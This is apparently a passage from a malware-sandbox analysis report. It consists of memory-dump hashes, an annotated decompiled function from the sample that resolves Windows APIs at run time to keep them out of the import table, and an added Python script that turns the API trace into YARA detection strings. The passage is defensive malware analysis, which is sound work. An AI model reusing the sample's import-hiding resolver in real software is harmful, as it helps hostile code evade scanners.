                                          • Instruction Fuzzy Hash: 64E02639A01104ABCF115ABBB88879E7FA8DB40292F004035FA0181001D630C914C2A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 34a59e5d79ad47be9176b4bbe78f32eb1d9a0983c463c97db4a4bc7422418a0e
                                          • Instruction ID: fa8e9fdd8381078261b1fe5a69bb528d1267dc62fb611a73c82354a0cc34a943
                                          • Opcode Fuzzy Hash: 34a59e5d79ad47be9176b4bbe78f32eb1d9a0983c463c97db4a4bc7422418a0e
                                          • Instruction Fuzzy Hash: 89F02B78D16328CFCBA1CF69D890ADDBBB1FB09314F501199E849A7315DB31AA82CF40
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 005da955e42a1b3d9a52f0095fb36f867b91de67d879727de02b0ad67d8de658
                                          • Instruction ID: d4392a179e8576d500b266f9930c992a978a191fa95393cc49fe724c9ca68513
                                          • Opcode Fuzzy Hash: 005da955e42a1b3d9a52f0095fb36f867b91de67d879727de02b0ad67d8de658
                                          • Instruction Fuzzy Hash: 1AE07574D05218AFCB44EFA8E9457ADBBB4FB48200F1046AAD818A3354E7745A51CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e97928523d79fdfc0fb3eeba1397e78b376f78c4fc757ceec60eb78f5b0bc3b5
                                          • Instruction ID: f4a0551377bb0f648a6b8645830bb2b511b38d52d63867b2d0b62dd59e6cb3fb
                                          • Opcode Fuzzy Hash: e97928523d79fdfc0fb3eeba1397e78b376f78c4fc757ceec60eb78f5b0bc3b5
                                          • Instruction Fuzzy Hash: A2E06D34A15115CFD760CF59C48498DF7F2FF44300F11C590E806AB218C734EA80CE50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 530e2824bcd652b010b474d94daaeb85030793db27c45581fed6120af062180f
                                          • Instruction ID: e65ac98220f8f8c5206f63945d97b503d8fcdb9551b059b7a9e6b6a74ae8614b
                                          • Opcode Fuzzy Hash: 530e2824bcd652b010b474d94daaeb85030793db27c45581fed6120af062180f
                                          • Instruction Fuzzy Hash: 3DD05BB58162008FD3955FF0B9093967FA2F745706F2809FDD58583555D7311941C711
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7980e276cf8493e361fd7a9bb32f0737da6ae7fc52b7e07893856057ced3f3a5
                                          • Instruction ID: c1879ce14b7a3fee00c68dab01024d4d0b588c2f409a8ea6622f00430f862b77
                                          • Opcode Fuzzy Hash: 7980e276cf8493e361fd7a9bb32f0737da6ae7fc52b7e07893856057ced3f3a5
                                          • Instruction Fuzzy Hash: 51E09A30D152698FDBA4DFAAC884B8CB7B1FF48204F008496D11AF6224DB306D85CF20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: m$|Y
                                          • API String ID: 0-1181860180
                                          • Opcode ID: 4f280ee6d11e1c05e21a12e14372abd058a8644f021a94fe6bdbdf6e1825fb6e
                                          • Instruction ID: a31d95eed68611266c22782a47cc907d6f72ba28e05f8dedc74783e42eb376a8
                                          • Opcode Fuzzy Hash: 4f280ee6d11e1c05e21a12e14372abd058a8644f021a94fe6bdbdf6e1825fb6e
                                          • Instruction Fuzzy Hash: 2691D074A15219DFCB44CFAAC58499EFBF1FF88210F24955AE419BB224D334AE42CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: m$|Y
                                          • API String ID: 0-1181860180
                                          • Opcode ID: 6937723b25065e585f8215fa85ef62322020d023b6ff8b0eae3b812736a6c736
                                          • Instruction ID: eb6fbc758901ce6ecb60ccecfe79e88b21e1fd83e963efab560cb631501c726f
                                          • Opcode Fuzzy Hash: 6937723b25065e585f8215fa85ef62322020d023b6ff8b0eae3b812736a6c736
                                          • Instruction Fuzzy Hash: B881D174A15219CFCB44CFAAC58499EFBF1FF88210B24959AE415BB324D334AE42CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: O(zA
                                          • API String ID: 0-6709333
                                          • Opcode ID: ff0d9ae9d1180efccdac9b33358d143b8692a6e7451f8f6fcfda3a8bc079c64f
                                          • Instruction ID: d33c11a0e7ec18a066c844c8b44a45996a1261964b4a9652a9e1fe35c790307f
                                          • Opcode Fuzzy Hash: ff0d9ae9d1180efccdac9b33358d143b8692a6e7451f8f6fcfda3a8bc079c64f
                                          • Instruction Fuzzy Hash: 7F6125B0D052199FCB48CFA6D5816EEFBB2FF88300F14846AE411E7214D7349A52CFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2d7f83643ff551492f604d5ecd00376f835b2b0a96d57fab5395538520b4ff98
                                          • Instruction ID: 351f2d253ef5b1e7a8a3c13d46ae482ab7e5f41ba17f640722c356c77f021682
                                          • Opcode Fuzzy Hash: 2d7f83643ff551492f604d5ecd00376f835b2b0a96d57fab5395538520b4ff98
                                          • Instruction Fuzzy Hash: 64D1AC71701604AFEB1AEB76C4507AAB7FBAF89304F2484ADD146DB3A0CB35E901CB55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f8d5206dc0b959cfa46d3c62157deb4b782b14bc1610c1590a530d592cb93f07
                                          • Instruction ID: 0f5927e776f30606a84bab6ff2036f1117f77da964825ce5104b1cc570897757
                                          • Opcode Fuzzy Hash: f8d5206dc0b959cfa46d3c62157deb4b782b14bc1610c1590a530d592cb93f07
                                          • Instruction Fuzzy Hash: 5F12A4F1412746AAD331DF65E8981897BA1F74532CB90420AD2A13BAD0D7FC194BCFE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9367b17ef32affb9d6737261a9cbf8ba95e9020036503f81ad0bf180615d08c5
                                          • Instruction ID: f662a2d30c09f8107bb0db83de4aeedd5bd10a1d1583304327d3a23ea73c783c
                                          • Opcode Fuzzy Hash: 9367b17ef32affb9d6737261a9cbf8ba95e9020036503f81ad0bf180615d08c5
                                          • Instruction Fuzzy Hash: 85A18E32E006198FDF05DFB5C8446EDF7B6FF85304B1586AAE905BB221EB75A905CB80
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c1c220245a9d3ce76fa99c76d8f1374674f4c1906a10331c0431c3768af5ac8
                                          • Instruction ID: 9b2b74e7d37f56dfd7559553ea2653926e44c6f95abb5229bbccce4441683367
                                          • Opcode Fuzzy Hash: 1c1c220245a9d3ce76fa99c76d8f1374674f4c1906a10331c0431c3768af5ac8
                                          • Instruction Fuzzy Hash: 3AD10730D2064A9ADB10FBA4D954ADDB7B1FFE5300F509B9AE00937264EF706AC4CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7c8737c5dfc311b788cf20f8447f87243c63a17993d04ded48bf2f21ec1eab20
                                          • Instruction ID: a988ad8d5616aefda59837f7bbf22ba60eda9c3412af3d83dc3ef01a015be1d9
                                          • Opcode Fuzzy Hash: 7c8737c5dfc311b788cf20f8447f87243c63a17993d04ded48bf2f21ec1eab20
                                          • Instruction Fuzzy Hash: 51B18B74E14219CFDB54CFA6C980A9EFBB2FF88304F2085AAE909A7355D7309A41CF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.301179027.0000000004B50000.00000040.00000001.sdmp, Offset: 04B50000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 213501f761a3bf731189f8c1447c01dfe802b5a45fce514d74fc38e75e363e3b
                                          • Instruction ID: 70ccde68e7ce81a40870ac3483a89caa157d428559dcfa0cb0639761afc35100
                                          • Opcode Fuzzy Hash: 213501f761a3bf731189f8c1447c01dfe802b5a45fce514d74fc38e75e363e3b
                                          • Instruction Fuzzy Hash: F7C127B1812746AAD731DF65E8881897B61FB8532CF50420AD2613B6D0D7FC188BCFE6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f5c8c18096248fc8cbcae12401261b8dc76832ac25e3250933c1954ec085bdef
                                          • Instruction ID: 17141369050cf32bd5fcdad4592e3659d065c899d312d287ec86bff501e10127
                                          • Opcode Fuzzy Hash: f5c8c18096248fc8cbcae12401261b8dc76832ac25e3250933c1954ec085bdef
                                          • Instruction Fuzzy Hash: 04813B74D1520ACFCB48CFE6D9415AEFBB2EF8A340F14986AC51AA7314D7349942CFA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ebbde980ee70f57a6a77694d009b6e621fe40e6be6978337b6519cb00791963a
                                          • Instruction ID: e2f3f2eb2c172be07a537be48f9c447b7ce39bafc71b57692e0dd2884435f9ff
                                          • Opcode Fuzzy Hash: ebbde980ee70f57a6a77694d009b6e621fe40e6be6978337b6519cb00791963a
                                          • Instruction Fuzzy Hash: 5D610674E012098FDB44CFAAC5C09EEBBF2EF88310F14946AE415F7214D730AA51CBA8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bbe7f1c537e677185af2fa8be62743725273df112408bb331859872f7f529d59
                                          • Instruction ID: e5dc7e68ba68f9fd5166b293fec4ed17cf73781731b7c23f4925a12a5a0dbd8a
                                          • Opcode Fuzzy Hash: bbe7f1c537e677185af2fa8be62743725273df112408bb331859872f7f529d59
                                          • Instruction Fuzzy Hash: 72615A70E052548FCB15CFA9C9906AEFBB2BF89304F24C4AAC848A7316D7309A45CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a5eb712a57979c799a374506b75dcce6f665d6768f80e611a11e8a80cdb3f29b
                                          • Instruction ID: cbb2e37b7845d7e789dd65c175afbad95aae2ee711ca9e0edc9b2310a6ed2dfa
                                          • Opcode Fuzzy Hash: a5eb712a57979c799a374506b75dcce6f665d6768f80e611a11e8a80cdb3f29b
                                          • Instruction Fuzzy Hash: 5E61E774E152198FDB44CFAAC5809EEFBF2AF88310F14942AE415F7224D730AA41CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e9686ee4253b0aed023d8bbf7df0b21592f2d638d338b667631a363061e6cdc
                                          • Instruction ID: 6df17d46c1309c44741f23035f6aa78888d59c14b32a0e8ceef13c50743f9b03
                                          • Opcode Fuzzy Hash: 2e9686ee4253b0aed023d8bbf7df0b21592f2d638d338b667631a363061e6cdc
                                          • Instruction Fuzzy Hash: 91611A74E04219CFCB14CF99D980AAEFBB2FB89304F24D5A9D808A7315D7309A45CF61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2b8fd82d6fcd9c3cccdf43cbb032f2f872bdf1881bc5d1078b0da3b83b894942
                                          • Instruction ID: 314fb293f185f783a81f3d382501f2cb5c5938dd2f01431a783d214c9b674186
                                          • Opcode Fuzzy Hash: 2b8fd82d6fcd9c3cccdf43cbb032f2f872bdf1881bc5d1078b0da3b83b894942
                                          • Instruction Fuzzy Hash: 815106B0E042199FDB44CFAAC4806AEFBF2FB88300F14C46AD919F7254D7349A518F99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 51daed71306c6ef519b959105c52b92f02c1c449ddfcb33b96c3cbb55114651b
                                          • Instruction ID: a80884fdbb8c48ae20383867b23e345ff0c714936891b4f244f5d833518a385e
                                          • Opcode Fuzzy Hash: 51daed71306c6ef519b959105c52b92f02c1c449ddfcb33b96c3cbb55114651b
                                          • Instruction Fuzzy Hash: 86516F70E0560A9FDB44CFAAD5815AEFBB2FF88300F24C46AD505E7218D3309A52CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 61469b5304f93d8293bf071d1171bd143df083c75cf6dce22a2eed7c5d2741ad
                                          • Instruction ID: b147c0211614129929fff927de861796a4f4a2b014ebc5ebc53f8f8eb6deeb92
                                          • Opcode Fuzzy Hash: 61469b5304f93d8293bf071d1171bd143df083c75cf6dce22a2eed7c5d2741ad
                                          • Instruction Fuzzy Hash: D541B270E0561A9FDB84CFAAC4806EEFBB2FF88300F24C569D915B7254D7349A518F98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b3acea2e9e4adb377c95868dbe1b3adba92fb5939e96b40a18928adaf0670bb1
                                          • Instruction ID: 5ac0b8cecd01f4c7614a571dd115ba619c8fc9bd57cc972bd55532a264d1404e
                                          • Opcode Fuzzy Hash: b3acea2e9e4adb377c95868dbe1b3adba92fb5939e96b40a18928adaf0670bb1
                                          • Instruction Fuzzy Hash: B8315E71D153559FDB0ACF6AC94529ABBF2BF8A300F18C0BBC408EB255EB340946CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 55d89a9b6490af7c4b93789b50be81a495b79b253517ab6a7b3e42ec9efbf8f1
                                          • Instruction ID: e6bfddb1846654d57d660c81f42ef656a94fcf96dd4784f8e9f370ff1da52aa3
                                          • Opcode Fuzzy Hash: 55d89a9b6490af7c4b93789b50be81a495b79b253517ab6a7b3e42ec9efbf8f1
                                          • Instruction Fuzzy Hash: 9A312DB1E016189FEB58CF6BDC4069EFBF3AFC9200F04C1AAD508AB264DB3059468F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.305993622.0000000006C60000.00000040.00000001.sdmp, Offset: 06C60000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: d96bbe4015ffc4fed72d6eb0004ad9a294338afa423bfdf65dfc8884f1e20f8c
                                          • Instruction ID: 4232e6afc0c57f16bfa5f255e15daf601b67a2680d4d9ef5017019e0e1d202f3
                                          • Opcode Fuzzy Hash: d96bbe4015ffc4fed72d6eb0004ad9a294338afa423bfdf65dfc8884f1e20f8c
                                          • Instruction Fuzzy Hash: 6F21F971E056189FEB48CFAB984069EFAF7AFC9200F04C17AD908A6264EB3006558F55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000000.00000002.296542012.0000000002630000.00000040.00000001.sdmp, Offset: 02630000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fa51100e9d324b6bda3703b939c63ba34eb551a00cd89737c336eee8e82d7779
                                          • Instruction ID: 56aead95d10b977f379d48b812a38adbf28e5a397d880229ecb42ab16ea45c5b
                                          • Opcode Fuzzy Hash: fa51100e9d324b6bda3703b939c63ba34eb551a00cd89737c336eee8e82d7779
                                          • Instruction Fuzzy Hash: E921F471E116199BDB08CFAAD9406DEFAF7AFC8210F14C03AD508A7218DB345A568F91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          C-Code - Quality: 100%
                                          			E00407D38() {
                                          				// Resolves every API below at run time (LoadLibraryA/GetModuleHandleA
                                          				// followed by GetProcAddress) and caches the pointers in globals, so the
                                          				// names never appear in the import table; this is the behaviour behind the
                                          				// "Contains functionality to dynamically determine API calls" signature.
                                          				struct HINSTANCE__* _t1;
                                          				_Unknown_base(*)()* _t2;
                                          				_Unknown_base(*)()* _t6;
                                          				_Unknown_base(*)()* _t14;
                                          				CHAR* _t20;
                                          
                                          				_t1 = LoadLibraryA("Psapi.dll"); // executed
                                          				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
                                          				 *0x41592c = _t2; // GetModuleFileNameExA pointer
                                          				if(_t2 == 0) {
                                          					// fallback if psapi.dll did not provide the export
                                          					 *0x41592c = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
                                          				}
                                          				 *0x415928 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW"); // GetModuleFileNameExW pointer
                                          				// Note: this fallback test re-checks the A pointer (0x41592c), not the W pointer just
                                          				// stored in 0x415928, so the W fallback only runs when the A lookup also failed.
                                          				if( *0x41592c == 0) {
                                          					 *0x415928 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
                                          				}
                                          				_t6 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
                                          				_t20 = "kernel32";
                                          				 *0x415934 = _t6; // GlobalMemoryStatusEx pointer
                                          				 *0x415b94 = GetProcAddress(GetModuleHandleA(_t20), "IsWow64Process");
                                          				 *0x415b98 = GetProcAddress(GetModuleHandleA(_t20), "GetComputerNameExW");
                                          				 *0x415930 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
                                          				_t14 = GetProcAddress(GetModuleHandleA(_t20), "SetProcessDEPPolicy");
                                          				 *0x415960 = _t14; // SetProcessDEPPolicy pointer
                                          				return _t14;
                                          			}

                                          Statement addresses for the decompiled lines above, in order: 0x00407d4b 0x00407d54 0x00407d5c 0x00407d63 0x00407d74 0x00407d74 0x00407d8f 0x00407d94 0x00407da5 0x00407da5 0x00407db7 0x00407db9 0x00407dc4 0x00407dd4 0x00407de8 0x00407df8 0x00407e00 0x00407e04 0x00407e0a

                                          APIs
                                          • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D54
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D72
                                          • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407D86
                                          • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DA3
                                          • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DB7
                                          • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DCC
                                          • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DDC
                                          • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407DF0
                                          • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
                                          • GetProcAddress.KERNEL32(00000000), ref: 00407E00
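                                          As an added example (not part of the Joe Sandbox report and not code from the sample), the script below parses API-trace lines in the form the "APIs" list above uses and pairs each LoadLibraryA/GetModuleHandleA call with the GetProcAddress that follows it, recovering the module/export pairs the function resolves at run time as a compact string-IOC set. It relies on the trace printing the export name as the second argument of the loader call (the report dumps stack contents, and the name has already been pushed for the following GetProcAddress), which is what the listing above shows; the sample input is those 18 lines copied inline, and the module name normalisation and the YARA string output are this example's own conventions.

```python
import re
from collections import defaultdict

# Constructed sample input: the 18 API-trace lines listed for E00407D38 above,
# in the "<api>.<module>(<args>), ref: <address>" form the report uses.
SAMPLE_TRACE = """
LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,00415978,00000000,00415940,0040759D,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D4B
GetProcAddress.KERNEL32(00000000), ref: 00407D54
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D6F
GetProcAddress.KERNEL32(00000000), ref: 00407D72
LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407D83
GetProcAddress.KERNEL32(00000000), ref: 00407D86
GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DA0
GetProcAddress.KERNEL32(00000000), ref: 00407DA3
LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DB4
GetProcAddress.KERNEL32(00000000), ref: 00407DB7
GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DC9
GetProcAddress.KERNEL32(00000000), ref: 00407DCC
GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DD9
GetProcAddress.KERNEL32(00000000), ref: 00407DDC
GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DED
GetProcAddress.KERNEL32(00000000), ref: 00407DF0
GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,004108CC,00000000), ref: 00407DFD
GetProcAddress.KERNEL32(00000000), ref: 00407E00
"""

# Calls that yield a module handle consumed by the next GetProcAddress.
LOADER_APIS = {"LoadLibraryA", "LoadLibraryW", "GetModuleHandleA", "GetModuleHandleW"}

LINE_RE = re.compile(
    r"^\s*(?P<api>\w+)\.(?P<host>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def parse_trace(text):
    """Return one dict per parseable trace line: API name, argument list, call site."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # blank or non-trace line
        calls.append({
            "api": m.group("api"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
        })
    return calls


def normalize_module(name):
    """'Kernel32.dll', 'kernel32.dll' and 'kernel32' all denote the same module (own convention)."""
    name = name.lower()
    return name[:-4] if name.endswith(".dll") else name


def resolved_imports(calls):
    """Pair each loader call with the next GetProcAddress, in call-site order.

    The export name is taken from the loader call's second argument: the trace
    prints stack contents, and the name is already pushed for GetProcAddress.
    Returns a list of (module, export, GetProcAddress call site).
    """
    pairs = []
    pending = None
    for call in sorted(calls, key=lambda c: c["ref"]):
        if call["api"] in LOADER_APIS:
            pending = call
        elif call["api"] == "GetProcAddress" and pending is not None:
            args = pending["args"]
            export = args[1] if len(args) > 1 and args[1] != "?" else "?"
            pairs.append((normalize_module(args[0]), export, call["ref"]))
            pending = None
    return pairs


def group_by_module(pairs):
    """Map module -> sorted unique export names, a compact string-IOC set."""
    grouped = defaultdict(set)
    for module, export, _ in pairs:
        grouped[module].add(export)
    return {module: sorted(exports) for module, exports in grouped.items()}


def yara_strings(pairs):
    """Emit YARA string definitions for the resolved export names (rule body is left to the analyst)."""
    names = sorted({export for _, export, _ in pairs if export != "?"})
    return [f'$api_{i} = "{name}" ascii' for i, name in enumerate(names)]


if __name__ == "__main__":
    pairs = resolved_imports(parse_trace(SAMPLE_TRACE))
    for module, export, ref in pairs:
        print(f"{ref:08X}  {module}!{export}")
    for module, exports in sorted(group_by_module(pairs).items()):
        print(f"{module}: {', '.join(exports)}")
    print("\n".join(yara_strings(pairs)))
```

The pairing is positional, so it only holds for straight-line resolver stubs like this one; a trace with interleaved loader calls from other threads would need the handle value returned by the loader call to match against GetProcAddress's first argument, which this report format does not show.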
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.299950040.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleModule$LibraryLoad
                                          • String ID: GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$kernel32$kernel32.dll
                                          • API String ID: 551388010-3266460993
                                          • Opcode ID: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                                          • Instruction ID: 7df7edf4bea3ca915ca9c3ab11915317f4629f066757df969619983bfa8a711c
                                          • Opcode Fuzzy Hash: a95c33b2883edc0f1f24b44dfa6ebdd0fa9b065003bbad78de045f2cdf40495f
                                          • Instruction Fuzzy Hash: D8112EF0E51794FAC720ABB6AC49FDA2E9CAA8C7513118427F204D3570D6BC94C08E6D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 19%
                                          			E00407452(void* __ecx, void* __edx, void* __eflags) {
                                          				char _v5;
                                          				char _v12;
                                          				void* _v16;
                                          				char _v32;
                                          				char _v48;
                                          				char _v64;
                                          				char _v80;
                                          				void* _t64;
                                          				char* _t68;
                                          				char* _t69;
